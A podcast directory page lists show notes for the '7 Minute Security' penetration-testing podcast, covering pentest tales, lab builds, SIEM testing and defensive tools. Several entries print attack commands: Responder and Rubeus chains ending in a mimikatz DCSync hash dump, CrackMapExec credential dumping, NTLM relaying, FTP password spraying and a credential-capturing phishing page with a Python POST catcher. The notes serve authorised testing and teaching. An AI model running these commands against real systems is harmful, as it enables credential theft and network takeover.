TopPodcast.com
Menu
  • Home
  • Top Charts
  • Top Networks
  • Top Apps
  • Top Independents
  • Top Podfluencers
  • Top Picks
    • Top Business Podcasts
    • Top True Crime Podcasts
    • Top Finance Podcasts
    • Top Comedy Podcasts
    • Top Music Podcasts
    • Top Womens Podcasts
    • Top Kids Podcasts
    • Top Sports Podcasts
    • Top News Podcasts
    • Top Tech Podcasts
    • Top Crypto Podcasts
    • Top Entrepreneurial Podcasts
    • Top Fantasy Sports Podcasts
    • Top Political Podcasts
    • Top Science Podcasts
    • Top Self Help Podcasts
    • Top Sports Betting Podcasts
    • Top Stocks Podcasts
  • Podcast News
  • About Us
  • Podcast Advertising
  • Contact
Not in our directory?
Add Show Here
Podcast Equipment
Center

toppodcastlogoOur TOPPODCAST Picks

  • Comedy
  • Crypto
  • Sports
  • News
  • Politics
  • True Crime
  • Business
  • Finance

Follow Us

toppodcastlogoStay Connected

    View Top 200 Chart
    Back to Rankings Page
    News

    7 Minute Security

    7 Minute Security is a weekly information security podcast focusing on penetration testing, blue teaming and building a career in security. The podcast also features in-depth interviews with industry leaders who share their insights, tools, tips and tricks for being a successful security engineer.

    Advertise

    Copyright: © Brian Johnson

    • Apple Podcasts
    • Google Play
    • Spotify

    Latest Episodes:
    7MS #600: First Impressions of Using AI on Penetration Tests Dec 01, 2023

    Hey friends, today I share my experience working with ChatGPT, Ollama.ai, PentestGPT and privateGPT to help me pentest Active Directory, as well as a machine called Pilgrimage from HackTheBox.

    Will AI replace pentesters as we know them today? In my humble opinion: not quite yet. Check out today's episode to hear more, and please join me on Wednesday, December 6 for my Webinar on this topic with Netwrix called Hack the Hackers: Exploring ChatGPT and PentestGPT in Penetration Testing!


    7MS #599: Baby's First Responsible Disclosure Nov 25, 2023

    Today we talk about our first experience working through the responsible disclosure process after finding vulnerabilities in a security product. We cannot share a whole lot of details as of right now, but wanted to give you some insight into the testing/reporting process thus far, which includes the use of:

    • BulletsPassView
    • MITMsmtp
    • mitmproxy

    7MS #598: Hacking Billy Madison - Part 4 Nov 17, 2023

    Today our good buddy Paul and I keep trying to hack the VulnHub machine based on the movie Billy Madison (see part 1 and 2 and 3). In today's final chapter, Paul and I:

    • Find Eric's secret SSH back door

    • Locate and decrypt a hidden file with Billy's homework

    • Build wordlists with cewl

    • Save Billy from the evil clutches of Eric Gordon!!!


    7MS #597: Let's JAMBOREE (Java-Android-Magisk-Burp-Objection-Root-Emulator-Easy) with Robert McCurdy Nov 11, 2023

    Today we had a blast talking with Robert McCurdy about JAMBOREE (Java-Android-Magisk-Burp-Objection-Root-Emulator-Easy)! JAMBOREE allows you to quickly spin up a portable Git/Python/Java environment and much more! From a pentesting POV, you can whip up an Android pentesting environment, BloodHound/SharpHound combo, Burp Suite...the list goes on!


    7MS #596: How to Succeed in Business Without Really Crying - Part 13 Nov 04, 2023

    After about a year break (last edition of this series was in October, 2022, we're back with an updated episode of How to Succeed in Business Without Really Crying. We cover:

    • Why we're not planning on selling the business any time soon
    • Fast Google Dorks Scan
    • Using ProtonVPN via command line
    • Our pre first impressions of a pentesting SaaS tool you've almost definitely heard of

    7MS #595: Choosing the Right XDR Strategy with Matt Warner of Blumira Oct 31, 2023

    Today we're joined by Matt Warner of Blumira (remember him from episodes #551 and #529 and #507?) to talk about choosing the right XDR strategy! There's a lot to unpack here. Are EDR, MDR and XDR related? Can you get them all from one vendor - and should you? Do you run them on-prem, in the cloud, or both? Join us as Matt answers these questions and more!


    7MS #594: Using PatchMyPC to Auto-Update Pentest Dropboxes Oct 23, 2023

    Today we're talking about how you can use PatchMyPc to keep your home PC and/or pentest dropbox automatically updated with the latest/greatest patches!


    7MS #593: Hacking Billy Madison - Part 3 Oct 15, 2023

    Hey friends, today my Paul and I kept trying to hack the VulnHub machine based on the movie Billy Madison (see part 1 and 2). In our journey we learned some good stuff:

    • Port knocking is awesome using utilities like knock:
    /opt/knock/knock 10.0.7.124 1466 67 1469 1514 1981 1986
    • Sending emails via command line is made (fairly) easy with swaks:
    swaks --to eric@madisonhotels.com --from vvaughn@polyfector.edu --server 192.168.110.105:2525 --body "My kid will be a soccer player" --header "Subject: My kid will be a soccer player"

    You could also use telnet and do this command by command - see this article from Black Hills Information Security for more info.

    • Hyda works good for spraying FTP creds:
    hydra -l user -P passlist.txt ftp://192.168.0.1
    • Check out my quick cheat sheet about bettercap (see episode #522) for some syntax on extracting WPA handshake data from cap files:
    # ...it looks like the new standard hash type might be m22000 per this article (https://hashcat.net/forum/thread-10253.html). In that case, here's what I did on the pcap itself to get it ready for hashcat: sudo /usr/bin/hcxpcapngtool -o readytocrack.hc22000 wifi-handshakes.pcap # Then crack with hashcat! sudo /path/to/hashcat -m22000 readytocrack.hc2000 wordlist.txt

    7MS #592: 7 Steps to Recover Your Hacked Facebook Account Oct 06, 2023

    Today we're talking about 7 steps you can take to (hopefully) reclaim a hacked Facebook account. The key steps are:

    1. Ask Facebook for help (good luck with that)
    2. Put out an SOS on your socials
    3. Flag down the FBI
    4. Call the cops!
    5. Grumble to your attorney general
    6. Have patience
    7. Lock it down (once you get the account back)!

    Also, I have to say that this article was a fantastic resource in helping me create the outline above.


    7MS #591: Tales of Pentest Pwnage - Part 52 Sep 29, 2023

    Today we talk about an awesome path to internal network pentest pwnage using downgraded authentication from a domain controller, a tool called ntlmv1-multi, and a boatload of cloud-cracking power on the cheap from vast.ai. Here's my chicken scratch notes for how to take the downgraded authentication hash capture (using Responder.py -I eth0 --lm) and eventually tweeze out the NTLM hash of the domain controller (see https://7ms.us for full show notes).


    7MS #590: Hacking Billy Madison - Part 2 Sep 22, 2023

    Today my Paul and I continued hacking Billy Madison (see part one here) and learned some interesting things:

    • You can fuzz a URL with a specific file type using a format like this:
    wfuzz -c -z file,/root/Desktop/wordlist.txt --hc 404 http://x.x.x.x/FUZZ.cap
    • To rip .cap files apart and make them "pretty" you can use tpick:
    tcpick -C -yP -r tcp_dump.pcap

    Or tcpflow:

    apt install tcpflow tcpflow -r
    • To do port knocking, you can use the knock utility:
    sudo git clone https://github.com/grongor/knock /opt/knock knock 1.2.3.4 21 23 25 69 444 7777777

    7MS #589: Tales of Pentest Pwnage - Part 51 Sep 15, 2023

    In today's tale of pentest pwnage we talk about:

    • The importance of local admin and how access to even one server might mean instant, full control over their backup or virtualization infrastructure

    • Copying files via WinRM when copying over SMB is blocked:

    $sess = New-PSSession -Computername SERVER-I-HAVE-LOCAL-ADMIN-ACCESS-ON -Credential *

    ...then provide your creds...and then:

    copy-item c:\superimportantfile.doc -destination c:\my-local-hard-drive\superimportantfile.doc -fromsession $sess
    • If you come across PowerShell code that crafts a secure string credential, you may able to decrypt the password variable with:
    [System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($MyVarIWantToDecryptGoesHere))

    7MS #588: Becoming a Sysmon Sensei with Amanda Berlin Sep 08, 2023

    Today Amanda Berlin from Blumira teaches us how to unlock the power of Sysmon so we can gain insight into the good, bad and ugly things happening on our corporate endpoints! Key takeaways:

    • Sysmon turns your windows logging up to 11, and pairs well with a config file like this one or this one.
    • Careful if you are are running sysmon on non-SSD drives - the intense number of writes might bring that disk to its knees.
    • Just getting started logging all the things with sysmon? Why not pump those logs into a free logging/alerting system like Wazuh?
    • I think it was SolarWinds log collector I was trying to think of while recording the show, not CloudTrail.

    7MS #587: Hacking Billy Madison Sep 01, 2023

    Today my pal Paul from Project7 and I hack the heck out of Billy Madison a vulnerable virtual machine that is celebrating its 7th anniversary this month!


    7MS #586: DIY Pentest Dropbox Tips – Part 8 Aug 25, 2023

    Today, sadly, might be the last episode of DIY pentest dropbox tips for a while because I found (well, ChatGPT did actually) the missing link to 100% automate a Kali Linux install! Check episode #449 for more info on building your Kali preseed file, but essentially the last line in my file runs a kali.sh script to download/install all the pentest tools I want. The "missing link" part is I figured out how to get Kali to reboot and then run a script one time to complete all the post-install stuff. So at the bottom of my kali.sh is this:

    sudo wget https://somesite/kali-docker.sh -O /opt/kali-docker.sh sudo chmod +x /opt/kali-docker.sh sudo touch /flag sudo wget https://somesite/docker.service -O /etc/systemd/system/mydocker.service sudo systemctl daemon-reload sudo systemctl enable mydocker.service

    The contents of docker.service are:

    [Unit] Description=Docker install [Service] Type=simple ExecStart=/opt/kali-docker.sh [Install] WantedBy=multi-user.target

    The beginning and end snippets of kali-docker.sh are:

    #!/bin/bash flag_file="/flag" if [ -e "$flag_file" ]; then # get bbot sudo docker run -it blacklanternsecurity/bbot:stable --help # Do a bunch of other install things... rm "$flag_file" else echo "Script already ran before. Exiting" fi

    So essentially the work flow is: kali.sh runs, downloads and installs kali-docker.sh, and also installs a service that runs kali-docker.sh on each reboot. But when kali-docker.sh runs, it checks for the presence of a file called /flag. If /flag exists, all the post-install commands will run. If it does not exist, those commands won't run. Simple, yet genius I think!


    7MS #585: DIY Pentest Dropbox Tips – Part 7 Aug 18, 2023

    Hey friends, today I'm super excited to share I found the missing link! Specifically, the missing piece that now allows me to create fully automated Windows 10 installs that serve as virtual pentest jumpboxes. Here are the high points:

    • When your deployment script is finishing and you need the system to reboot and run some final commands, temporarily add your account as an auto-login account like so:
    new-itemproperty -path 'hklm:\software\microsoft\windows nt\currentversion\winlogon' -name AutoAdminLogon -value 1 -force new-itemproperty -path 'hklm:\software\microsoft\windows nt\currentversion\winlogon' -name DefaultUserName -value "your-local-user" -force new-itemproperty -path 'hklm:\software\microsoft\windows nt\currentversion\winlogon' -name DefaultPassword -value "your-password" -force

    Then tell Windows to run your final script one time after automatically logging in as your-local-user:

    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" /v MyRunOnceKey /t REG_SZ /d "c:\your-final-script.bat"

    Finally, make sure your your-final-script.bat deletes the auto-login creds:

    reg delete "hkey_local_machine\software\microsoft\windows nt\currentversion\Winlogon" /v DefaultUserName /f reg delete "hkey_local_machine\software\microsoft\windows nt\currentversion\Winlogon" /v DefaultPassword /f reg delete "hkey_local_machine\software\microsoft\windows nt\currentversion\Winlogon" /v AutoAdminLogon /f

    7MS #584: Tales of Pentest Pwnage - Part 50 Aug 11, 2023

    In today's tale of pwnage, we'll talk about how domain trusts can be dangerous because they have...well...trust issues.


    7MS #583: Cred-Capturing Phishing with Caddy Server Aug 04, 2023

    Today we talk about crafting cool cred-capturing phishing campaigns with Caddy server! Here's a quick set of install commands for Ubuntu:

    sudo apt install -y debian-keyring debian-archive-keyring apt-transport-https curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/gpg.key' | sudo gpg --dearmor -o /usr/share/keyrings/caddy-stable-archive-keyring.gpg curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/debian.deb.txt' | sudo tee /etc/apt/sources.list.d/caddy-stable.list sudo apt update sudo apt install caddy -y

    Create an empty directory for your new site, and then create a file called Caddyfile. If all you want is a simple static site (and you've already pointed DNS for yourdomain.com to your Ubuntu droplet, just put the domain name in the Caddyfile:

    domain.com

    Then type sudo caddy run - and that's it! You'll serve up a blank site with lovely HTTPS goodness! If you want to get more fancy, make a index.html with a basic phishing portal:

    Your rad awesome eyeball cool phishing portal! body { background-image: url("https://tangent.town/static/background.jpg"); background-repeat:no-repeat; background-size:cover; }

    User Name:

    Password:

    Unauthorized use is prohibited!

    This will now be served when you visit domain.com. However, Caddy doesn't (to my knowledge) have a way to handle POST requests. In other words, it doesn't have the ability to log usernames and passwords people put in your phishing portal. One of our pals from Slack asked ChatGPT about it and was offered this separate Python code to run as a POST catcher:

    from flask import Flask, request app = Flask(__name__) @app.route('/capture', methods=['POST']) def capture(): print(request.form) return 'OK', 200 if __name__ == '__main__': app.run(host='0.0.0.0', port=5000)

    If you don't have Flask installed, do this:

    sudo apt install python3-pip -y sudo pip install Flask

    Run this file in one session, then in your index.html file make a small tweak in the form action directive:

    Try sending creds through your phishing portal again, and you will see they are now logged in your Python POST catcher!


    7MS #582: Using Wazuh as a SIEM for Work and Home Jul 31, 2023

    Today we had a blast playing with Wazuh as a SIEM you can use for work and/or home. Inspiration for this episode came from Network Chuck.

    This one-liner will literally get Wazuh installed in about 5 minutes:

    curl -sO https://packages.wazuh.com/4.4/wazuh-install.sh && sudo bash ./wazuh-install.sh -a

    P.S. if you accidentally close your command window before writing down the admin password (like I did), you can use this command to retrieve it:

    sudo tar -O -xvf wazuh-install-files.tar wazuh-install-files/wazuh-passwords.txt

    Once Wazuh is installed, I recommend going to Management > Configuration > Edit Configuration, look for a section that starts with and change no to yes.

    Also, before you start deploying agents, I recommend making some groups for them, which I believe has to be done at the command line:

    /var/ossec/bin/agent_groups -a -g windows-boxes -q /var/ossec/bin/agent_groups -a -g linux -q

    From there you should be ready to start rockin' some agent installs. Have fun!


    7MS #581: Tales of Pentest Pwnage - Part 49 Jul 21, 2023

    Oooo, giggidy! Today's tale of pentest pwnage is about pwning vCenter with CVE-2021-44228 - a vulnerability that lets us bypass authentication entirely and do/take what we want from vCenter! Key links to make the magic happen:

    • How to exploit log4j manually in vCenter
    • How to automate the attack!
    • Tool to steal the SAML database you extract from vCenter

    7MS #580: Hacking Tommy Callahan - Part 3 Jul 17, 2023

    Today me and my pal Paul from Project7 did a live hacking session and finally got the Callahan Auto brake pad Web app back online! Hopefully you enjoyed this hacking series. The feedback has been great, so we may have to take a crack at Billy in the near future as well.


    7MS #579: Hacking Tommy Callahan - Part 2 Jul 07, 2023

    Hey friends, today we're continuing our series on pwning the Tommy Boy VM on VulnHub VM! P.S. did you miss part one? Check it out on YouTube. Joe "The Machine" Skeen and I had a blast poking and prodding at the VM in hopes to fix the broken Callahan Auto brake-ordering Web app. Some tips/tricks we cover:

    • It's always a good idea to look at a site's robots.txt file
    • crunch is awesome for making wordlists
    • fcrackzip is rad for cracking encrypted zip files
    • dirbuster works well for busting into hidden files and subfolders
    • exiftool works well to pull metadata out of images

    7MS #578: Interview with Mike Toole of Blumira Jun 30, 2023

    Today I'm excited to share a featured interview with our new friend Mike Toole of Blumira. We talk about all things EDR, including:

    • How does it differ from something like Windows Defender?

    • What things do I need to keep in mind if I'm in the market for an EDR purchase?

    • Is Mac EDR any good?

    • How do attackers bypass EDR?

    • Will AI create industructible malware, take over the human race and then use our bodies for batteries?


    7MS #577: Tales of Pentest Pwnage - Part 48 Jun 16, 2023

    Holy schnikes - this episode is actually 7 minutes long! What a concept!

    Anyway, today I give you a couple tips that have helped me pwn some internal networks the last few weeks, including:

    • Getting a second (and third?) opinion on Active Directory Certificate Services vulnerabilities!

    • Analyzing the root domain object in BloodHound to find some misconfigs that might equal instant domain admin access!


    7MS #575: Annoying Attackers with ADHD - Part 2 Jun 09, 2023

    Hey friends! Today we're taking a second look at ADHD - Active Defense Harbinger Distribution - a cool VM full of tools designed to annoy/attribute/attack pesky attackers! The tools covered today include:

    PHP-HTTP-TARPIT

    A tool to confuse and waste bot/scanner/hacker time. Grab it here and check out our setup instructions:

    sudo git clone https://github.com/msigley/PHP-HTTP-Tarpit.git /opt/tarpit cd /opt/tarpit sudo mv la_brea.php /var/www/html/index.php cd /var/www/html/ # Delete the default HTMLM files that are there sudo rm DEFAULT .HTML FILES # Start/restart apache2 sudo service apache2 stop sudo service apache2 start # It's easier to see PHP-HTTP-TARPIT in action from command line: curl -i http://IP.RUNNING.THE.TARPIT Spidertrap

    This tool tangles Web visitors in a never-ending maze of pages with links!

    sudo git clone https://github.com/adhdproject/spidertrap.git /opt/spidertrap cd /opt/spidertrap # Open spidertrap.py and change listening port from 8080 to 80 sudo nano spidertrap.py # Run the trap sudo python3 spidertrap.py Weblabyrinth

    This tool presents visitors with a blurb of text from Alice in Wonderland. That text has links that takes them to...you guessed it...more Alice in Wonderland excerpts! I especially like that if you visit ANY folder or link inside Weblabyrinth, content is served (return code 200 for anything and everything).

    I had problems getting this running on a fresh Kali box so it's probably better to run right off the ADHD distro using their instructions.


    7MS #574: Annoying Attackers with ADHD Jun 02, 2023

    Hey friends! Today we're looking at ADHD - Active Defense Harbinger Distribution - a cool VM full of tools designed to annoy/attribute/attack pesky attackers! ADHD gets you up and running with these tools quickly, but the distro hasn't been updated in a while, so I switched to a vanilla Kali system and setup a cowrie SSH honeypot as follows (see 7ms.us for full list of commands).


    7MS #573: Securing Your Mental Health - Part 4 May 26, 2023

    Today we're talking about reducing anxiety by hacking your mental health with these tips:

    • Using personal automation to text people important reminders
    • Using Remind to create a personal communication "class" with your family members
    • Using Smartsheet (not a sponsor) to create daily email "blasts" to yourself about all the various project todos you need to tackle

    7MS #572: Protecting Your Domain Controllers with LDAP Firewall May 19, 2023

    Today we look at LDAP Firewall - a cool (and free!) way to defend your domain controllers against SharpHound enumeration, LAPS password enumeration, and the noPac attack.


    7MS #571: Simple Ways to Test Your SIEM - Part 2 May 12, 2023

    Hey friends! This week I spoke at the Secure360 conference in Minnesota on Simple Ways to Test Your SIEM. This is something I covered a while back on the podcast, but punched up the content a bit and built a refreshed a two-part GitHub gist that covers:

    • Questions you can ask a prospective SIEM/SOC solution to figure out which one is the right fit for you
    • All the tools/tips/scripts/etc. you need to run through 7 (and more!) simple ways to test your SIEM!

    7MS #570: How to Build a Vulnerable Pentest Lab - Part 4 May 05, 2023

    SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

    In today's episode we staged an NTLM relay attack using a vulnerable SQL server.

    First we used CrackMapExec (see our two part series on Cracking and Mapping and Execing with CrackMapExec - part 1 / part 2) to find hosts with SMB signing disabled:

    cme smb x.x.x.x/24 -u USER -p PASS --gen-relay-list smbsigning.txt

    Then we setup lsarelayx in one window:

    lsarelayx --host=localhost

    And in a second window we ran ntlmrelayx.py:

    python ntlmrelayx.py -smb2support --no-smb-server -t smb://VICTIM

    Finally, in a third window we triggered authentication from the vulnerable SQL server:

    Invoke-SQLUncPathInjection -verbose -captureip OUR.ATTACKING.IP.ADDRESS

    Boom! Watch the local usernames and hashes fall out of the victim system.

    We also tried doing a multirelay scenario where we had a list of victim hosts in a targets.txt file like this:

    victim1 victim2 victim3

    Then we tweaked the ntlmrelayx command slightly:

    python ntlmrelayx.py -smb2support --no-smb-server -tf targets.txt

    Interestingly(?) only victim2 was attacked.

    Lastly, we ran the same attack but added the -socks option to establish SOCKS connections upon successful relay:

    python ntlmrelayx.py -smb2support --no-smb-server -tf targets.txt -socks

    Interestingly(?) we got a low-priv user to relay and setup a SOCKS connection, but not the domain admin configured on the SQL server.

    TLDR/TLDL: relaying credentials to a single victim with ntlmrelay on a Windows hosts seems to work great! Your milage may vary if you try to pull off more advanced tricks with ntlmrelay.


    7MS #569: Interview with Jim Simpson of Blumira Apr 28, 2023

    Today we're excited to share a featured interview with our new friend Jim Simpson, CEO of Blumira. Jim was in security before it was hip/cool/lucrative, working with a number of startups as well as some big names like Duo. Blumira and 7 Minute Security have a shared love for helping SMBs be more secure, so it was great to chat with Jim about the IT/security challenges faced by SMBs, and what we can do make security more simple and accessible for them.


    7MS #568: Lets Play With the 2023 Local Administrator Password Solution! Apr 21, 2023

    Hey friends, today we're playing with the new (April 2023) version of Local Administrator Password Solution (LAPS). Now it's baked right into PowerShell and the AD Users and Tools console. It's awesome, it's a necessary blue team control for any size company, and you should basically stop reading this and install LAPS now.


    7MS #567: How to Build an Intentionally Vulnerable SQL Server Apr 14, 2023

    Hey friends, today we're talking about building an intentionally vulnerable SQL server, and here are the key URLs/commands talked about in the episode:

    • Download SQL Server here

    • Install SQL via config .ini file

    • Or, install SQL via pure command line

    • Deploy SQL with a service account while also starting TCP/IP and named pipes automagically:

    setup.exe /Q /IACCEPTSQLSERVERLICENSETERMS /ACTION="install" /FEATURES=SQL /INSTANCENAME=MSSQLSERVER /TCPENABLED=1 /NPENABLED=1 /SQLSVCACCOUNT="YOURDOMAIN\YOUR-SERVICE-ACCOUNT" /SQLSVCPASSWORD="YOUR PASSWORD" /SQLSYSADMINACCOUNTS="YOURDOMAIN\administrator" "YOURDOMAIN\domain users"
    • Run PowerUpSQL to find vulnerable SQL servers:
    $Targets = Get-SQLInstanceDomain -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 10 | Where-Object {$_.Status -like "Accessible"}
    • Audit the discovered SQL servers:
    Get-SQLInstanceDomain -verbose | invoke-sqlaudit -verbose
    • Fire off stored procedures to catch hashes!
    Invoke-SQLUncPathInjection -verbose -captureIP IP.OF-YOUR.KALI.BOX

    7MS #566: Tales of Pentest Pwnage - Part 47 Mar 31, 2023

    Ok, I know we say this every time, but it is true this time yet again: this is our favorite tale of pentest pwnage. It involves a path to DA we've never tried before, and introduced us to a new trick that one of our favorite old tools can do!


    7MS #565: How to Simulate Ransomware with a Monkey Mar 24, 2023

    Hey friends, today we talk through how to simulate ransomware (in a test environment!) using Infection Monkey. It's a cool way to show your team and execs just how quick and deadly an infection can be to your business. You can feed the monkey a list of usernames and passwords/hashes to use for lateral movement, test network segmentation, set a UNC path of files to actually encrypt (careful - run in a test lab - NOT in prod!) and more!


    7MS #564: First Impressions of OVHcloud Hosted vCenter Mar 17, 2023

    Today we offer you some first impressions of OVHcloud and how we're seriously considering moving our Light Pentest LITE training class to it! TLDR:

    • It runs on vCenter, my first and only virtualization love!

    • Unlimited VM "powered on" time and unlimited bandwidth

    • Intergration with PowerShell so you can run a single script to "heal" your environment to a gold image

    • Easy integration with pfSense to be able to manage the firewall and internal/external IPs

    • Price comparable to what we're paying now in Azure land


    7MS #563: Cracking and Mapping and Execing with CrackMapExec - Part 2 Mar 10, 2023

    Hey friends, today we're covering part 2 of our series all about cracking and mapping and execing with CrackMapExec. Specifically we cover:

    # Enumerate where your user has local admin rights: cme smb x.x.x.x/24 -u user -p password # Set wdigest flag: cme smb x.x.x.x -u user -p password -M wdigest -o ACTION=enable # Dump AD creds: cme smb IP.OF.DOMAIN.CONTROLLER -u user -p password --ntds --enabled # Clean up AD dump output: cat /path/to/file.ntds | grep -iv disabled | cut -d ':' -f1,4 | grep -v '\$' | sort # Check ms-ds-machineaccountquota: cme ldap x.x.x.x -u user -p password -M maq # Check for Active Directory Certificate Services: cme ldap x.x.x.x -u user -p password -M adcs # Pull all AD user descriptions: cme ldap x.x.x.x -u user -p password -M get-desc-users # Pull all AD user descriptions down to a file and search for users with "pass" in description: cme ldap x.x.x.x -u user -p password -M user-desc # CrackMapExec database (CME) ## Clear database sudo rm -r ~/.cme ## Handy commands inside the cmedb prompt: hosts shares creds export shares detailed shares.csv export creds detailed creds.txt

    7MS #562: Cracking and Mapping and Execing with CrackMapExec Mar 03, 2023

    Hey friends, today we covered many things cracking and mapping and execing with CrackMapExec. Specifically:

    # General enumeration to see if your account works, and where: cme smb x.x.x.x -u username -p pass # Check if print services are enabled: cme smb x.x.x.x -u username -p pass -M spooler # Check for the nopac vuln: cme smb x.x.x.x -u username -p pass -M nopac # Find GP passwords: cme smb DOMAIN.CONTROLLER.IP.ADDRESS -u username -p pass -M gpp_password # Get list of targets with smb signing: cme smb x.x.x.x -u username -p pass --gen-relay-list smbsigning.txt # Set wdigest flag: cme smb x.x.x.x -u username -p pass -M widgest -o ACTION=enable # Dump creds/hashes: cme smb x.x.x.x -u username -p pass -M lsassy # Do pass the hash attacks cme smb x.x.x.x -u username -H HASH # Dump SAM database: cme smb x.x.x.x -u username -p pass --sam # Enumerate SMB shares cme smb x.x.x.x -u username -p pass --shares # Conduct slinky attack: cme smb x.x.x.x -u username -p pass -M slinky -o NAME=LOL SERVER=10.0.7.7 # Cleanup from slinky attack: cme smb x.x.x.x -u username -p pass -M slinky -o NAME=LOL SERVER=10.0.7.7

    7MS #561: Interview with Chris Furner of Blumira Feb 24, 2023

    Today I sat down with Chris Furner of Blumira to talk about all things cyber insurance. Many of 7MinSec's clients are renewing their policies this time of year, and many are looking into policies for the first time. Naturally, there are a ton of questions to ask and things to think about to make good coverage decisions for your business:

    • How do I get started in looking for a cyber policy - with my general liability insurer? Or are there companies that specialize just in cyber insurance?

    • How do I make sure I have the appropriate levels of coverage?

    • What are basic things I can do from a security standpoint that pretty much any insurer is going to expect me to do?

    Enjoy the interview, where we cover these questions - and more! And be sure to also check out Blumira's whitepaper on this topic called The State of Cyber Insurance.


    7MS #560: 7MOOCH - Dolphin Rides Are Done Dude Feb 17, 2023

    Hey friends, I took a mental health break this week and pre-podcasted this episode of a new series called 7MOOCH: 7 Minutes of Only Chuckles. In today's story, we unpack a situation in Hawaii that made me exclaim the following quite loudly: "Dolphin rides are done, dude!"


    7MS: #559: Tales of Pentest Pwnage - Part 46 Feb 10, 2023

    Ooooo giggidy! Today's episode is about a pentest pwnage path that is super fun and interesting, and I've now seen 3-4 times in the wild. Here are some notes from the audio/video that will help bring this to life for you (oh and read this article for a great tech explanation of what's happening under the hood):

    Change the Responder.conf file like so:

    ; Custom challenge. ; Use "Random" for generating a random challenge for each requests (Default) Challenge = 1122334455667788

    Run Responder with --disable-ess flag

    sudo python3 /opt/responder/Responder.py -I eth0 --disable-ess

    Use printerbug to coax authentication from a domain controller:

    sudo python3 /opt/krbrelay-dirkjanm/printerbug.py yourdomain.com/someuser@IP.OF.DOMAIN.CONTROLLER IP.OF.ATTACKING.BOX

    Convert hash to make it easier to crack!

    sudo python3 /opt/ntlmv1-multi/ntlmv1.py --ntlmv1 THE-HASH-YOU-GOT-FROM-RESPONDER

    Take the NTHASH:XXX token and go to crack.sh to have it cracked in about 30 seconds!

    Now you can do a Rubeus asktgt with the DC hash:

    rubeus.exe asktgt /domain:yourdomain.com /user:DOMAIN-CONTROLLER-NAME$ /rc4:HASH-GOES-HERE /nowrap

    Now pass the ticket and impersonate the DC LOL MUAHAHAHAHAHAHAAH!!

    rubeus.exe ptt /ticket:TICKET GOES HERE

    Use mimikatz to dump all hashes!

    mimikatz.exe privilege::debug log hashes.txt lsadump::dcsync /domain:yourdomain.com /all /csv

    7MS #558: How to Build a Vulnerable Pentest Lab - Part 2 Feb 07, 2023

    Today we continue part 2 of a series we started a few weeks ago all about building a vulnerable pentesting lab. Check out the video above, and here are the main snippets of code and tips to get you going:

    • Use Youzer to import a bunch of bogus users into your Active Directory:
    sudo python ./youzer.py --generate --generate_length 20 --ou "ou=Contractors,dc=brifly,dc=us" --domain brifly.us --users 1000 --output lusers.csv
    • Make a Kerberoastable user:
    New-AdUser -Name "Kerba Roastable" -GivenName "Kerba" -Surname "Roastable" -SamAccountName Kerba -Description "ROASTED!" -Path "OU=Contractors,DC=brifly,DC=us" -AccountPassword (ConvertTo-SecureString "Password1" -AsPlainText -force) -passThru -PasswordNeverExpires $true enable-adaccount Kerba setspn -a IIS_SITE/brifly-dc01.brily.us:77777 briflyus\kerba

    7MS #557: Better Passive Network Visibility Using Teleseer Jan 27, 2023

    Today we're talking about Teleseer, which is an awesome service to give you better network visibility - whether you're on the blue, red or purple team! It all starts with a simple packet capture, and ends with gorgeous visuals and insight into what the heck is on your network and - from a pentester's perspective - delicious vulnerabilities that may lie within!


    7MS #556: How to Build a Vulnerable Pentest Lab Jan 20, 2023

    Today's episode is brought to us by our friends at Blumira!

    Today we kick off a series all about building your own vulnerable pentest lab from scratch, specifically:

    • Spinning up a domain controller with a few lines of PowerShell
    • Installing Active Directory Domain Services
    • Setting up an intentionally cruddy password policy
    • Baking in the MS14-025 vulnerability

    P.S. if you're looking for a more automated/push-button solution to get up and going with a lab to play in, check out some of these options:

    https://github.com/Orange-Cyberdefense/GOAD https://automatedlab.org/en/latest/ https://github.com/microsoft/MSLab https://github.com/davidprowe/BadBlood https://github.com/cliffe/secgen https://github.com/WazeHell/vulnerable-AD


    7MS #555: Light Pentest eBook 1.1 Release Jan 13, 2023

    Today we're releasing version 1.1 of our Light Pentest eBook. Changes discussed in today's episode (and shown live in the accompanying YouTube video) include:

    • Some typos and bug fixes
    • A new section on finding systems with unconstrained delegation and exploiting them
    • A new section on finding easily pwnable passwords via password spraying
    • A new section relaying credentials with MITM6 (be careful using some of its options - read this
    • New ways (and some words of warning) to dump hashes from Active Directory

    7MS #554: Simple Ways to Test Your SIEM Jan 06, 2023

    Today we talk about Simple Ways to Test Your SIEM. Feel free to check out the YouTube version of this presentation, as well as our interview with Matt from Blumira for even more context, but here are the essential tools and commands covered:

    Port scanning nmap 10.0.7.0/24 - basic nmap scan massscan -p1-65535,U:1-65535 --rate=1000 10.0.7.0/24 -v - scan all 65k+ TCP and UDP ports!

    Password spraying Rubeus.exe spray /password:Winter2022! /outfile:pwned.txt - try to log into all AD accounts one time with Winter2022! as the password, and save any pwned creds to pwned.txt

    Kerberoasting and ASREPRoasting rubeus.exe kerberoast /simple rubeus asreproast /nowrap

    Key group membership changes net group "GROUP NAME" user-to-add-to-a-group /add

    Dump Active Directory hashes cme smb IP.OF.THE.DOMAINCONTROLLER -u user -p password --ntds --enabled ntdsutil "ac i ntds" "ifm" "create full c:\dc-backup" q q

    SMB share hunting Invoke-HuntSMBShares -Threads 100 -OutputDirectory C:\output - SMB enumeration using PowerHuntShares


    7MS #553: The Artificial Intelligence Throat Burn Episode Dec 30, 2022

    Hey friends, today's episode is hosted by an AI from Murf.ai because I suffered a throat injury over the holidays and spent Christmas morning in the emergency room! TLDL: I'm fine, but if you want the (sort of) gory details and an update on my condition after my ENT appointment, check out today's episode. Otherwise, we'll see you next week when our regularly scheduled security content continues in 2023.

    Merry belated Christmas, happy holidays and happiest of new year to you and yours!


    7MS #552: Tales of Pentest Pwnage - Part 45 Dec 24, 2022

    SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

    Today's tale of pentest pwnage covers some of the following attacks/tools:

    • Teleseer for packet capture visualizations on steroids!
    • Copernic Desktop Search
